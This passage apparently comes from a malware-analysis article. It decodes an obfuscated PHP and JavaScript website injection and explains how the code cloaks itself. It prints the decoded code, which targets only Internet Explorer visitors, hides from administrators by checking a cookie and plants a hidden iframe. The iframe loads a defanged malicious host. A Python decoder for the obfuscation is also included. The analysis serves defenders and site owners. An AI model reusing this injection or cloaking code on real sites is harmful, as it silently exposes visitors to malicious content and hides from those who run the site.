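The number list is the whole payload: each entry n[j] becomes one character via String.fromCharCode(-h*(2-1+1*n[j])) with h=-parseInt('012')/5. The following Python, added here as an example rather than taken from the page, reproduces that arithmetic on the first 48 values copied from the string above. The one thing to get right is parseInt('012'): older engines (Internet Explorer 8 among them) read the leading zero as octal and return 10, so h is -2 and the list decodes to the JavaScript shown above; an ES5-era engine returns 12, h becomes -2.4, and the very same list decodes to garbage. That is worth knowing before pasting such a sample into a modern browser console and concluding it is harmless.

```python
"""Decode the tilde-separated number list from the obfuscated JavaScript above."""


def js_parse_int_012(legacy_octal: bool) -> int:
    """parseInt('012'): 10 on engines that read a leading 0 as octal, 12 on ES5+ engines."""
    return int("012", 8) if legacy_octal else int("012", 10)


def js_from_char_code(x: float) -> str:
    """String.fromCharCode(x) truncates toward zero and keeps the low 16 bits."""
    return chr(int(x) & 0xFFFF)


def decode_tilde_list(numbers: str, legacy_octal: bool = True) -> str:
    """Replay  ss=ss+String[f](-h*(2-1+1*n[j]))  over every element of n."""
    h = -js_parse_int_012(legacy_octal) / 5            # h=-parseInt('012')/5
    out = []
    for tok in numbers.split("~"):                     # n='...'.split('~')
        n = float(tok.strip())                         # stray spaces from copy/paste are harmless
        out.append(js_from_char_code(-h * (2 - 1 + 1 * n)))
    return "".join(out)


# First 48 values of the n='...' string above (the full list has 611 entries, matching i!=611).
SAMPLE_PREFIX = (
    "3.5~3.5~51.5~50~15~19~49~54.5~48.5~57.5~53.5~49.5~54~57~22~50.5~49.5~57~33.5~53~49.5~"
    "53.5~49.5~54~57~56.5~32~59.5~41~47.5~50.5~38~47.5~53.5~49.5~19~18.5~48~54.5~49~59.5~"
    "18.5~19.5~44.5~23~45.5~19.5~60.5"
)

if __name__ == "__main__":
    print("legacy octal parseInt:", repr(decode_tilde_list(SAMPLE_PREFIX, legacy_octal=True)))
    print("decimal parseInt:     ", repr(decode_tilde_list(SAMPLE_PREFIX, legacy_octal=False)))
```

Feeding the complete 611-entry string to decode_tilde_list() yields the iframer() code listed above; if the length of the list and the loop bound in the sample ever disagree, the payload was truncated when it was copied.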

This is another example of an obfuscated script used to insert an iframe, but here the PHP is "double" encoded. This is the code you would find in your homepage or one of your common files:

eval(gzinflate(base64_decode('...')));

When we plug that long string of characters into the decoder we get:

if (!isset($frmDs)){
global $frmDs;
$frmDs = 1;
$ua = $_SERVER['HTTP_USER_AGENT'];
if (strpos($ua, 'Windows')!==false&&strpos($ua,'MSIE')!==false){
error_reporting(0);
if(strpos(strtolower(@$_SERVER["HTTP_COOKIE"].';'.$_SERVER['REQUEST_URI']),'admin')!==false)$isadm=1;
if(isset($isadm)||!isset($_COOKIE['__utmfr']))@setcookie('__utmfr',rand(1,1000),time()+86400*(($isadm)?365:7),'/');
if(!isset($isadm)&&!isset($_COOKIE['__utmfr']))print('');
}
}

This is starting to be more readable, and the logic explains why a site owner rarely sees the injection: the payload is printed only to Windows/Internet Explorer visitors, never to a request whose cookies or URL contain "admin" (those get a one-year __utmfr cookie and nothing else), and only once per visitor, because the seven-day __utmfr cookie is set on the first visit and checked on every later one. The string passed to print() is another long base64 encoded blob; plug that into the decoder and we can see the JavaScript that appears in the pages of the site.

try{document.body--}catch(gdsgd){ww=window;v="v"+"al";if(ww.document)try{document.body=12;}catch(gdsgsdg){ asd=0;try{q=document.createElement("div");}catch(q){asd=1;}if(!asd){w={a:ww}.a;v="e".concat(v);}}e=w[v];if(1) {f=new Array(...)} w=f;s=[];for(i=0;-i+709!=0;i+=1){j=i;if((031==0x19))if(e)s=s+String.fromCharCode((1*w[j]+e("j%4")));}xz=e;xz(s)}

A "de-obfuscation" of the JavaScript makes the purpose of the code clear. (Note the constant-true test (031==0x19), written with a legacy octal literal, and e("j%4"), which is eval("j%4"): each array entry is shifted by j modulo 4 before it becomes a character.)

function gra(a, b){
return Math.floor(Math.random() * (b - a + 1)) + a;
}
function rs(){
return Math.random().toString(36).substring(5);
}
if (navigator.cookieEnabled){
var stnm = rs();
var ua = navigator.userAgent;
if (ua.indexOf('Windows') != -1 && ua.indexOf('MSIE') != -1){
document.write('<style>.s' + stnm + ' { position:absolute; left:-' + gra(600, 1000) + 'px; top:-' + gra(600, 1000) + 'px; }</style> <div class="s' + stnm + '"><iframe src="hxxp://leenhjxsy.myfw.us/ad/feed.php" width="' + gra(300, 600) + '" height="' + gra(300, 600) + '"></iframe></div>');
}
var exp = new Date();
exp.setDate(exp.getDate() + 7);
if (document.cookie.indexOf('__utmfr=') == -1){
document.cookie = '__utmfr=' + rs() + '; expires=' + exp.toGMTString() + '; path=/';
}
}

When the JavaScript is executed by the user's browser the result is a hidden iframe, pushed off-screen by a random negative offset and given a random class name and random dimensions so the markup differs on every page load, loading malicious content from another site.

<style>.sot719io4 { position:absolute; left:-806px; top:-869px; }</style> <div class="sot719io4"> <iframe src="hxxp:// leenhjxsy . myfw . us /ad/feed.php" width="564" height="303"></iframe></div>